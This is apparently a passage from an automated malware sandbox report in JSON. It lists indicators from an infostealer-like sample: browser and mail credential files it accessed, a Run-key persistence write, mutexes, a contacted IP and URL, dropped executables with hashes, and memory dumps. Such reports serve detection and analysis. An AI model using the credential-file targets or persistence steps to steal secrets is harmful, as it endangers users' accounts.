"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Apple Computer\\Preferences\\keychain.plist", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\apple computer\\preferences\\keychain.plist", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera\\opera\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera\\Opera7\\profile\\wand.dat", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera\\opera7\\profile\\wand.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", "hashes": [], "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\opera software\\opera stable\\login data", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [ { "ip_address": "70.39.145.109", "type": "ip_address_artifact", "version": 1 } ], "mutexes": [ { "mutex_name": "Global\\.net clr networking", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "MACA73F0A", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\I78B95E2E", "operations": [ "access", "delete" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "Global\\M78B95E2E", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "MA991ED3B", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 }, { "mutex_name": "MB66D4A35", "operations": [ "access" ], "type": "mutex_artifact", "version": 1 } ], "registry": [ { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "write", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Thunderbird", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Clients\\Mail\\Microsoft Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Mozilla\\Mozilla Firefox 25.0\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\seamonkey.exe", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "neakmedia.com/hybfPDcL/", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/294b381e200aa3f343989877c9ef5efdda25ca42", "file_type": "created_file", "id": "file_2", "md5_hash": "d6c8126371d37ffe3100755db6aa22ed", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\temp\\42753.exe", "sha1_hash": "294b381e200aa3f343989877c9ef5efdda25ca42", "sha256_hash": "fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec", "size": 102400, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/294b381e200aa3f343989877c9ef5efdda25ca42", "file_type": "created_file", "id": "file_3", "md5_hash": "d6c8126371d37ffe3100755db6aa22ed", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "sha1_hash": "294b381e200aa3f343989877c9ef5efdda25ca42", "sha256_hash": "fbff242aeeff98285e000ef03cfa96e87d6d63c41080d531edcb455646b64eec", "size": 102400, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/de72320cc8fc12f2e410afa07809b620f81066dc", "file_type": "created_file", "id": "file_4", "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "size": 94208, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/de72320cc8fc12f2e410afa07809b620f81066dc", "file_type": "created_file", "id": "file_5", "md5_hash": "2b8584cab96d20ee851054f9fedef7f3", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "sha1_hash": "de72320cc8fc12f2e410afa07809b620f81066dc", "sha256_hash": "f99020bb1a5659d35ad57d0dd13d053c7ab20c0b0b70201b71b4e3aafede7cd1", "size": 94208, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_6", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\c570.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_7", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\c571.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_8", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\c572.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/787f5296c509df55e9dea0f22ea76afaa8953676", "file_type": "created_file", "id": "file_9", "md5_hash": "f10107805ff54bb9c1e1cb047b604439", "norm_filename": "c:\\programdata\\c572.tmp", "sha1_hash": "787f5296c509df55e9dea0f22ea76afaa8953676", "sha256_hash": "f4a00adb6eeaf4985068b04cb755ecb8874f7e4fbdd7c8630b0ba96c99b63a68", "size": 112, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "file_type": "created_file", "id": "file_10", "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "norm_filename": "c:\\programdata\\c571.tmp", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "size": 112, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b", "file_type": "modified_file", "id": "file_11", "md5_hash": "e56a6538abf1d60544ce14111c423323", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "f57cc7b3be0d2cf0b65d0397e76c73717bd1a96b", "sha256_hash": "0341e7374090ca82b3ff7c1a6cbfd85ebc48be5ec3135aaf183c0c0c7da993da", "size": 65536, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d", "file_type": "modified_file", "id": "file_12", "md5_hash": "e8289ca60a86329fef2726ababd2b99a", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "a2567af5c9e4f7f9e9e08f5f8aec657a41692d4d", "sha256_hash": "33900323a9a4bdde6a22ee56a613f0dd67f275d3571321cdac54ea7321e244de", "size": 32768, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/47f9117eb7cf12bd3c36295b8084e98d962b6861", "file_type": "modified_file", "id": "file_13", "md5_hash": "4d32b3456316311c50d77f7a37556236", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "47f9117eb7cf12bd3c36295b8084e98d962b6861", "sha256_hash": "4ff606ec32478199d9183c9ec73ed4d0787f52ecc6504b7ce2d5cdf3ded0a5a6", "size": 65536, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000002-region_00000432-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000002-region_00000432-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_27", "md5_hash": "7734cae61b5fdb4a053b7019aad57eea", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "de85aa92be2459ca0c1236d57414ed4ec9599b61", "sha256_hash": "35e0bd447bc4dd1d94f93632b7f79c9a8e6ce6bdd6f39094856ca0df472a464b", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000435-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000435-addr_0x0000000000210000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_28", "md5_hash": "e87a18166e4e78002643f1279d2a3a2b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "8c385e44e5c70a3e02f6cbbd411fda13530be577", "sha256_hash": "ce6ee155fba14d7717e9daf6be6fd4691a8375512f6a28a8171ecaf2ae3e65b2", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000440-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000440-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_29", "md5_hash": "cbd1ae4f64c1c0e1c514591bafff924b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "674410da7a8213067cd625da326140a2d2c789d1", "sha256_hash": "6431e99440d91d661cad54cb76360eaa18d4231b49d45ae23314fbc107375dbb", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000441-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000441-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_30", "md5_hash": "d34c5bc123946ee82ea7e4225374860c", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "aa4f98305baa756cc5bcc81d5dff80f8d380a1ed", "sha256_hash": "bc696f205e51d513b3a3e657b616fb748827b182b69a801af7e87dad27f821f3", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000442-addr_0x0000000000070000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000442-addr_0x0000000000070000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_31", "md5_hash": "24624e3b93c46cdb6f2fe0ce4fd27403", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fba63a2b8ebf6c0ce2be53adfbebc2d6fc99c9fe", "sha256_hash": "40c068ed64afca8b9dae009800b0c76a235121c05cbbe331e2c542b902bf9202", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000463-addr_0x0000000000340000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000463-addr_0x0000000000340000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_32", "md5_hash": "0835b2f9ed727462e813ac2538174926", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "23e3081f10aaad83ca2b12115f4759621ff21b15", "sha256_hash": "9d8c1647b9aa58da4282575d3d118c2351936ed70bcd2d14aa74930bdc9443f6", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000471-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000471-addr_0x00000000001f0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_33", "md5_hash": "0c7d79707076913fa66e3dd84778a06b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "f3a80b9ea2dc4f353763e7d8c14069093b766c46", "sha256_hash": "00a54745c85094c4aa876cfdd27ee1b79ff35fa8d5f1a4795711e2f79aad1732", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000472-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000472-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_34", "md5_hash": "baa095d0f424ded37169dccfabe2a48b", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "13de5554742b8bdbbac3f1dd140af759f9f055a4", "sha256_hash": "556d13cdbbe748d7480e2434b1f1d58ff20c3c4211c0491da0abbd118c4e58cc", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000475-addr_0x00000000011b0000-size_0x0000000000040000-perm_rwx.bin", "filename": "process_00000002-region_00000475-addr_0x00000000011b0000-size_0x0000000000040000-perm_rwx.bin", "id": "proc_dump_35", "md5_hash": "eca27985ab6ff8e3102b4a7de6b0a41f", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "5b290b37bd76a45987dc354cf758ebac82230d9c", "sha256_hash": "dc45e06fd67e8899bcf96a105889f9a570356f448ed3e26eb52dfa1280baa0bb", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000476-addr_0x0000000001210000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000002-region_00000476-addr_0x0000000001210000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_36", "md5_hash": "f0f436a4f3abbc30865b42976ecbfb1e", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e98fc27138dcad99e615b26419d827d04ae3e00c", "sha256_hash": "6738e69e98846d019a74ed68e725fda3195624f9971ad1e05e17446f9dc22164", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000480-addr_0x0000000001090000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000480-addr_0x0000000001090000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_37", "md5_hash": "4eeed40ca6bf143b648b90fc9698e839", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "891cadc03fef51c6400a3a386a12916a21ae77cd", "sha256_hash": "3c535458851dbf386bc24916ff72f04f7ae9a315d27c9f8766286a68c69b457b", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000491-addr_0x0000000001510000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000491-addr_0x0000000001510000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_38", "md5_hash": "cb4e157f213ad8c935b6c05dfb406db3", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e35aafa86ee0fb8d49c3bb60552793ac79f74fb2", "sha256_hash": "b8e38482dbb0bc2826b51d77a8775c74065aca692decff9e5556455a5c45b060", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000494-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000494-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_39", "md5_hash": "2d986ff49f2e4ce914c76b5c0d87ecf5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c4e0bba34323079a4f987aa4f93a29505488cf3f", "sha256_hash": "3d236d705a7d027385141544208810a636b44073ce912df51e7f91e82a5f7e4e", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000502-addr_0x0000000001580000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000002-region_00000502-addr_0x0000000001580000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_40", "md5_hash": "2fa0b1e79c7c2e66fb915d1f3da60c03", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "65f99f5ecc9995be972c00be7a4a3b12802c71c3", "sha256_hash": "afb501946de077244b85a2e8ee28a8ddb7b3ddd8aa8e34fa624a8bcdae419d96", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000506-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000506-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_41", "md5_hash": "e504b701edfa0ba6c2f3c43c71f1e7a1", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a5dc428494ee0d1ccc2c20ad064a149f49880846", "sha256_hash": "a7a01ba4116cee90ceddbd2fc8b93913d520619d7e3cea4373b4319841d9a026", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000507-addr_0x0000000001b40000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000507-addr_0x0000000001b40000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_42", "md5_hash": "7a5cab559e9071fb2f5de14f603566a5", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c0c05992f57a3a9657510c497fb6d4687c48eec5", "sha256_hash": "689d9f97af73ea044091894af445858b49afbb66c92aa11ea2b7441f183dfaa5", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_43", "md5_hash": "dc14f7f4b30baa8f96abb56c6339a747", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0eb9c9fd9708f6bd905849800b0aeb6cc7837f3d", "sha256_hash": "70345177e047dcb11591bbd9ef332c9ebacb82dafa6dc2b1cdea7d94412bfb9d", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000510-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000510-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_44", "md5_hash": "f215a4b5140bf253f7358d2d39de019d", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bf7b0daabe54cfb1b28ca3430afa87df7b005976", "sha256_hash": "646e3a4ee9c27c090a5cfcdc67e8ff3f9a3d7e67822ca424de4ce83575be60aa", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000517-addr_0x0000000001db0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000002-region_00000517-addr_0x0000000001db0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_45", "md5_hash": "717e49d212e78904d7246898a2db870a", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "4e99f05bf6e08d0990620c27030b0042ca888039", "sha256_hash": "6dc33bc9213da909436a24a2cdd77b65aa2c2be314f0bbf89864d89a55befb85", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000519-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000002-region_00000519-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_46", "md5_hash": "ac6e60147ba38307f902613fce81924d", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fd2b4cebc3c60b739c33fb47ed8cb4cfa7d7d388", "sha256_hash": "276cfd881f1b298c69d424dfa0f10e70206887d85f087f2c12d2a09e7b0b9d68", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000525-addr_0x0000000001c20000-size_0x0000000000040000-perm_rwx.bin", "filename": "process_00000002-region_00000525-addr_0x0000000001c20000-size_0x0000000000040000-perm_rwx.bin", "id": "proc_dump_47", "md5_hash": "d249afd52595916b32fc83c452d4e06f", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "28c4caec4fcc44628165f7aa0c9b9dc5155fc350", "sha256_hash": "d4e336751015675bfb55da9455a81fc14357e8174b762bdddf9b4962d88e9f2f", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000002-region_00000530-addr_0x0000000001ad0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000002-region_00000530-addr_0x0000000001ad0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_48", "md5_hash": "f29e4e6d62202b8b1936264782bd2b50", "ref_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "93c942387a38ebcab76f65982ab2eacfdd1a455c", "sha256_hash": "b08b4e202700387260ba3d73c14c9d8c62b1788cf6cd9ef67b5d58885acd7150", "size": 65536, "type": 